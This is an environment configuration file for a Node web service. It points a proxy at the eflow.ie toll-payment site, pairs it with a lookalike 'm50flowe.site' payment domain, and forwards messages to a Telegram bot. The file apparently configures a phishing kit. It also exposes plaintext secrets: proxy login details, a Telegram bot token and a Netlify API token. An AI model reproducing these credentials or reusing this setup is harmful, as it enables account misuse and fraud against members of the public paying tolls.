NODE_ENV=production
PORT=3000
TARGET_URL=https://eflow.ie
USE_PROXY=true
PROXY_TYPE=http
PROXY_HOST=135.125.153.168
PROXY_PORT=10035
PROXY_USERNAME=6dakhmhc9d2s
PROXY_PASSWORD=kpb63kp86e0y
PROXY_TIMEOUT=120000
TELEGRAM_BOT_TOKEN=8528667086:AAHrl7LOf7kimNCwfFNOFMPVkWgGTv_KUuM
TELEGRAM_CHAT_ID=-1003622716214
TELEGRAM_ADMIN_CHAT_ID=-1003622716214
HOSTER_API_TOKEN=nfp_Y3zpouopEDAPzZk2f5kqD2fBeT7c6qftef45
NETLIFY_API_TOKEN=nfp_Y3zpouopEDAPzZk2f5kqD2fBeT7c6qftef45
SERVER_IP=213.176.79.129
HOST=0.0.0.0
TRUST_PROXY=true
CUSTOM_DOMAIN=
PAYMENT_SYSTEM_URL=https://m50flowe.site
LOG_LEVEL=info
LOG_REQUESTS=true
LOG_RESPONSES=false
LOG_DIR=./logs
ENABLE_COMPRESSION=true
ENABLE_WEBSOCKET=true
ENABLE_STATIC=true
STATIC_DIR=./public
